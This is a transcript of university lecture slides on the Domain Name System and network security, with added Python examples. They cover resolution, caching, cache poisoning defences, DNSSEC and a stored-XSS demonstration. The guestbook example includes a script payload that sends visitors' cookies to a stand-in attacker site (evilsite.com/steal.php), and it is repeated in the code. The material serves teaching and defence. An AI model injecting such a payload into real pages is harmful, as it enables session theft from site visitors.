Computer Networks: Domain Name System

Upload: isabelle-burt

Post on 31-Dec-2015


DESCRIPTION

Computer Networks: Domain Name System. The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses; the running example maps www.example.com to 208.77.188.166. PowerPoint PPT presentation.

TRANSCRIPT

Page 1: Computer Networks:  Domain  Name System

Computer Networks: Domain Name System

Page 2: Computer Networks:  Domain  Name System

Domain Name System
• The domain name system (DNS) is an application-layer protocol for mapping domain names to IP addresses

[Figure: a browser reaches the same site ("My Example Blog Spot") via http://www.example.com and via http://208.77.188.166; DNS maps www.example.com to 208.77.188.166]

Page 3: Computer Networks:  Domain  Name System

Iterative Name Resolution

[Figure: the application on the local machine asks the resolver of its local name server; on a cache miss that resolver queries, in turn, the root (.) server (1), the .com server (2) and the google.com server (3), each of which has its own resolver and cache and returns an answer]

Page 4: Computer Networks:  Domain  Name System

Name Resolution
• Resolution method when answer not in cache:

[Figure: message sequence between Client, ISP DNS server, root name server, com name server and example.com name server]
Client -> ISP DNS server: Where is www.example.com?
ISP DNS server -> root name server: Where is www.example.com?
root name server -> ISP DNS server: Try com nameserver
ISP DNS server -> com name server: Where is www.example.com?
com name server -> ISP DNS server: Try example.com nameserver
ISP DNS server -> example.com name server: Where is www.example.com?
example.com name server -> ISP DNS server: 208.77.188.166
ISP DNS server -> Client: 208.77.188.166

Page 5: Computer Networks:  Domain  Name System

DNS Caching
Step 1: query yourdomain.org

[Figure: the application on the local machine asks its resolver (cache miss); the local NS resolver (cache miss) forwards the query to the authoritative name server]

Step 2: receive reply and cache at local NS and host

[Figure: the answer flows back from the authoritative name server to the local NS and then to the local machine, and is stored in both caches]

Page 6: Computer Networks:  Domain  Name System

DNS Caching (cont'd)
Step 3: use cached results rather than querying the ANS

[Figure: local machine 2 queries the local NS for the same name; the local NS answers from its cache without contacting the authoritative name server]

Step 4: Evict cache entries upon TTL expiration
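As an added illustration (not part of the slides), the iterative resolution of pages 3 and 4 and the caching steps of pages 5 and 6 in one runnable model: the local name server walks root -> com -> example.com by following referrals, caches the answer with its TTL, serves later queries from cache, and evicts the entry once the TTL has expired. The authoritative data, the server names and the 300-second TTL are constructed for this example.

```python
# Constructed authoritative data mirroring the slides' example: the root refers
# "com" questions to the com server, com refers "example.com" to its own name
# server, and example.com holds the A record (with a 300 s TTL) for www.
AUTHORITATIVE = {
    "root": {"ns": {"com": "com-ns"}, "a": {}},
    "com-ns": {"ns": {"example.com": "example.com-ns"}, "a": {}},
    "example.com-ns": {"ns": {}, "a": {"www.example.com": ("208.77.188.166", 300)}},
}

def ask(server, qname):
    """One iterative step: the authoritative server either answers or refers."""
    data = AUTHORITATIVE[server]
    if qname in data["a"]:
        return "answer", data["a"][qname]
    labels = qname.split(".")
    for i in range(len(labels)):          # longest matching delegation first
        zone = ".".join(labels[i:])
        if zone in data["ns"]:
            return "referral", data["ns"][zone]
    return "nxdomain", None

class LocalNameServer:
    """The ISP / local name server of the slides: iterates from the root and caches."""

    def __init__(self, clock):
        self.clock = clock   # injectable clock so TTL expiry can be simulated
        self.cache = {}      # qname -> (ip, expiry time)
        self.log = []        # (server contacted or "cache", qname), for inspection

    def resolve(self, qname):
        now = self.clock()
        if qname in self.cache:
            ip, expiry = self.cache[qname]
            if now < expiry:                      # step 3: serve from cache
                self.log.append(("cache", qname))
                return ip
            del self.cache[qname]                 # step 4: evict on TTL expiration
        server = "root"
        for _ in range(8):                        # bound the referral chain
            self.log.append((server, qname))
            kind, payload = ask(server, qname)
            if kind == "answer":
                ip, ttl = payload
                self.cache[qname] = (ip, now + ttl)   # step 2: cache the reply
                return ip
            if kind != "referral":
                return None                       # no such name
            server = payload                      # "try the com / example.com server"
        return None
```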

Page 7: Computer Networks:  Domain  Name System

Pharming: DNS Hijacking
• Changing IP associated with a server maliciously:

[Figure: with normal DNS, www.example.com resolves to 208.77.188.166 and the browser shows the genuine "My Premium Blog Spot" login page (userID, password); under a pharming attack the same name resolves to 74.208.31.63, an identical-looking login page served by the attacker]

Phishing: the different web sites look the same.

Page 8: Computer Networks:  Domain  Name System

DNS Cache Poisoning

• Basic idea: give DNS servers false records and get them cached

• DNS uses a 16-bit request identifier to pair queries with answers

• Cache may be poisoned when a name server:
– Disregards identifiers
– Has predictable ids
– Accepts unsolicited DNS records

Page 9: Computer Networks:  Domain  Name System

DNS Cache Poisoning Prevention

• Use random identifiers for queries
• Always check identifiers
• Port randomization for DNS requests
• Deploy DNSSEC
– Challenging because it is still being deployed and requires reciprocity

http://www.youtube.com/watch?v=1d1tUefYn4U http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/wireless_attacks/wireless_attacks_demo.html
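To make the prevention checklist concrete, here is an added example (not from the slides or the linked labs) of the validation a resolver performs on the receiving side: a random 16-bit ID plus a random source port per query, acceptance only of a reply whose ID, port, source address and question match an outstanding query, and a bailiwick filter that discards records outside the zone the queried server is responsible for. The last function quantifies why port randomization matters, using the blind-guess model implied by the 16-bit identifier bullet. Class and field names are my own.

```python
import secrets
from dataclasses import dataclass

@dataclass(frozen=True)
class Query:
    txid: int      # 16-bit request identifier
    sport: int     # randomized UDP source port
    qname: str
    qtype: str

@dataclass
class Response:
    txid: int
    dport: int     # port the reply arrived on (must equal the query's source port)
    src_ip: str
    qname: str
    qtype: str
    records: list  # (owner, type, rdata) from the answer and additional sections

def in_bailiwick(owner, zone):
    """True if a record's owner name lies inside the zone the server was asked about."""
    return owner == zone or owner.endswith("." + zone)

class Resolver:
    def __init__(self):
        self.pending = {}  # (txid, sport) -> (Query, server_ip)

    def send_query(self, qname, server_ip):
        # Random 16-bit ID plus a random source port: ~32 bits a forger must guess
        txid = secrets.randbelow(1 << 16)
        sport = 1024 + secrets.randbelow(65536 - 1024)
        q = Query(txid, sport, qname, "A")
        self.pending[(txid, sport)] = (q, server_ip)
        return q

    def accept(self, resp, zone):
        """Return the records safe to cache, or [] if the reply is rejected."""
        key = (resp.txid, resp.dport)
        if key not in self.pending:               # unknown id/port: unsolicited, drop
            return []
        q, server_ip = self.pending[key]
        if resp.src_ip != server_ip or (resp.qname, resp.qtype) != (q.qname, q.qtype):
            return []                             # wrong server or wrong question: drop
        del self.pending[key]                     # each query accepts exactly one reply
        return [r for r in resp.records if in_bailiwick(r[0], zone)]

def forgery_success_probability(attempts, id_bits=16, port_bits=0):
    """Chance that `attempts` blind guesses hit a valid (id, port) before the real reply."""
    space = 1 << (id_bits + port_bits)
    return 1 - (1 - 1 / space) ** attempts
```

With only the 16-bit ID, 65536 guesses succeed with probability about 0.63; adding a random port drops the same effort to well under one in a thousand.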

Page 10: Computer Networks:  Domain  Name System

DNSSEC
• Guarantees:
– Authenticity of DNS answer origin
– Integrity of reply
– Authenticity of denial of existence

• Accomplishes this by signing DNS replies at each step of the way

• Uses public-key cryptography to sign responses
• Typically uses trust anchors, entries in the OS, to bootstrap the process

Page 11: Computer Networks:  Domain  Name System

DNS Signing

Page 12: Computer Networks:  Domain  Name System

DNSSEC Deployment
• As the internet becomes regarded as critical infrastructure there is a push to secure DNS
• NIST is in the process of deploying it on root servers now
• May add considerable load to DNS servers, with packet sizes considerably larger than the 512-byte size of UDP packets

• There are political concerns with the US controlling the root level of DNS

Page 13: Computer Networks:  Domain  Name System

Development steps

1. Work on the following lab first to understand DNS pharming and cache poisoning attacks.
2. Learn basics in HTML5
3. Design scenarios of DNS attacks
4. Implementation and user study

Page 14: Computer Networks:  Domain  Name System


Experience DNS attacks

DNS pharming attack lab from Kevin Du's SEED Labs at Syracuse University

http://www.cis.syr.edu/~wedu/seed/Labs/Attacks_DNS/

Page 15: Computer Networks:  Domain  Name System


HTML5

• The new standard for HTML
• New elements, new attributes, full CSS3 support, video and audio, 2D/3D graphics, local storage, local SQL database, web applications
• New features should be based on HTML, CSS, DOM, and JavaScript
• Reduce the need for external plugins (like Flash)
• Better error handling
• More markup to replace scripting
• HTML5 should be device independent

• URL: http://www.w3schools.com/html/html5_intro.asp

Page 16: Computer Networks:  Domain  Name System

04/19/2023 UTC/CSE 16

Interactive Security Visualization

Page 17: Computer Networks:  Domain  Name System


Network Security Visualization – Packet Sniffer

A packet sniffer is a program that captures all of the packets of data that pass through a given network interface, and recognizes and decodes certain packets of interest.

http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/packet_sniffer/packet_sniffer.html

Page 18: Computer Networks:  Domain  Name System


Network Security Visualization -- Wireless Network Attacks Simulator

Eavesdropping: The attacker configures his/her network interface into promiscuous mode, which allows a network device to read each network packet that arrives at the device.

Evil Twin: An evil twin is a wireless access point (AP) that masquerades as a legitimate one.

Man in the Middle: The attacker intercepts the traffic between two computers. The attacker sniffs packets from the network, may modify the packets, and inserts them back into the network.

ARP Cache Poisoning: Address Resolution Protocol (ARP) is a network layer protocol used to associate an IP address with a MAC address. A network device has an ARP cache, which contains all the IP addresses and MAC addresses the device has already matched together.

http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/wireless_attacks/wireless_attacks.html

Page 19: Computer Networks:  Domain  Name System


Network Security Visualization -- SYN Flood

SYN flood, one of the denial-of-service attacks

http://williams.comp.ncat.edu/IA_visualization_labs/security_visual_tools/SYNFloodDemo/index.htm

Page 20: Computer Networks:  Domain  Name System


Network Security Visualization – Web Security

Cross site scripting: attacker injects scripting code into pages generated by a web application
Script could be malicious code: JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash

Threats: phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising, execution of code on the client, ...

Page 21: Computer Networks:  Domain  Name System

XSS Example
Website allows posting of comments in a guestbook
Server incorporates comments into page returned:

<html>
<head><title>My Guestbook!</title></head>
<body>
Thanks for signing my guestbook!<br />
Here's what everyone else had to say:<br />
Joe: Hi! <br />
John: Hello, how are you? <br />
Jane: How does this guestbook work? <br />
</body>
</html>

Comment that includes malicious JavaScript:

Evilguy: <script>
document.location = "http://www.evilsite.com/steal.php?cookie="+document.cookie;
</script>


guestbook.html:

<html>
<head><title>Sign My Guestbook!</title></head>
<body>
Sign my guestbook!
<form action="sign.php" method="POST">
<input type="text" name="name">
<input type="text" name="message" size="40">
<input type="submit" value="Submit">
</form>
</body>
</html>

If sign.php copies whatever the user types into the form straight into the guestbook content, that text is served unchanged to every other visitor.

The injected script redirects each visitor to the attacker's site and appends the visitor's cookies to the URL as a GET parameter of the steal.php page.
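Added example (not from the slides): the guestbook rendered the way a naive sign.php would, beside the same page with output encoding, run over the four comments above; a Set-Cookie helper shows the HttpOnly flag that keeps the session cookie out of document.cookie. The function names, the session cookie name and the detector regex are constructed for this example.

```python
import html
import re

# Constructed guestbook entries; the last one is the malicious comment from the slide.
COMMENTS = [
    ("Joe", "Hi!"),
    ("John", "Hello, how are you?"),
    ("Jane", "How does this guestbook work?"),
    ("Evilguy", '<script>document.location = "http://www.evilsite.com/steal.php?'
                'cookie=" + document.cookie;</script>'),
]

HEADER = ["<html><head><title>My Guestbook!</title></head><body>",
          "Thanks for signing my guestbook!<br />",
          "Here's what everyone else had to say:<br />"]

def render_vulnerable(comments):
    """Behaves like a sign.php that copies user input into the page unchanged."""
    lines = list(HEADER)
    for name, message in comments:
        lines.append(f"{name}: {message} <br />")   # raw concatenation: stored XSS
    lines.append("</body></html>")
    return "\n".join(lines)

def render_safe(comments):
    """Same page, but every user-controlled value is HTML-escaped on output."""
    lines = list(HEADER)
    for name, message in comments:
        lines.append(f"{html.escape(name)}: {html.escape(message)} <br />")
    lines.append("</body></html>")
    return "\n".join(lines)

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

def contains_script_tag(page):
    """Crude detector used here only to compare the two renderings."""
    return SCRIPT_TAG.search(page) is not None

def session_cookie_header(session_id):
    """HttpOnly keeps the cookie out of document.cookie, so even an injected
    script cannot read it and hand it to a steal.php-style endpoint."""
    return f"Set-Cookie: session={session_id}; HttpOnly; Secure; SameSite=Lax"
```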